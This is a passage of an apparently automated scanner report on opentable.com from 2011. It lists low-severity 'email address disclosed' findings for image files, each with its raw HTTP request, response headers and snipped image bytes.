Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR.......C.....YLB....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.58. http://www.opentable.com/img/restProfile/ToolBarBGCenterGray.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/ToolBarBGCenterGray.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/ToolBarBGCenterGray.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3592
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR................O...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.59. http://www.opentable.com/img/restProfile/icons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/icons.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/icons.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6028
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:56 GMT

.PNG
.
...IHDR.......x.....
_)....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.60. http://www.opentable.com/img/restProfile/offersIcons.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restProfile/offersIcons.png

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restProfile/offersIcons.png HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true; s_nr=1317646515523-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4922
Content-Type: image/png
Last-Modified: Fri, 23 Sep 2011 02:09:52 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:57 GMT

.PNG
.
...IHDR...0..........:.....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

8.61. http://www.opentable.com/img/restimages/90.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/90.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/90.jpg HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 24216
Content-Type: image/jpeg
Last-Modified: Tue, 25 Oct 2005 21:28:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:54 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

8.62. http://www.opentable.com/img/restimages/x4/12796.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/12796.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/12796.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1626
Content-Type: image/jpeg
Last-Modified: Fri, 05 Nov 2010 17:41:49 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:08 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.63. http://www.opentable.com/img/restimages/x4/12817.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/12817.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/12817.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1687
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:19:44 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.64. http://www.opentable.com/img/restimages/x4/13705.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/13705.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/13705.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1789
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:19:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:38 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.65. http://www.opentable.com/img/restimages/x4/18361.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/18361.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/18361.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1835
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.66. http://www.opentable.com/img/restimages/x4/19294.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/19294.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/19294.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1604
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:44 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.67. http://www.opentable.com/img/restimages/x4/2051.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/2051.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/2051.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1499
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:35 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.68. http://www.opentable.com/img/restimages/x4/21061.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/21061.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/21061.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1451
Content-Type: image/jpeg
Last-Modified: Tue, 12 Jul 2011 17:12:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:33 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.69. http://www.opentable.com/img/restimages/x4/21835.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/21835.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/21835.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1615
Content-Type: image/jpeg
Last-Modified: Fri, 12 Nov 2010 23:51:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:06 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.70. http://www.opentable.com/img/restimages/x4/22711.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/22711.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/22711.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1794
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.71. http://www.opentable.com/img/restimages/x4/23506.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/23506.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/23506.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1688
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:20:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.72. http://www.opentable.com/img/restimages/x4/23587.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/23587.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/23587.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1629
Content-Type: image/jpeg
Last-Modified: Tue, 27 Sep 2011 16:26:31 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:43 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.73. http://www.opentable.com/img/restimages/x4/2376.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/2376.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/2376.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1712
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:21:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:47 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.74. http://www.opentable.com/img/restimages/x4/25267.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/25267.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/25267.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1629
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:21:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
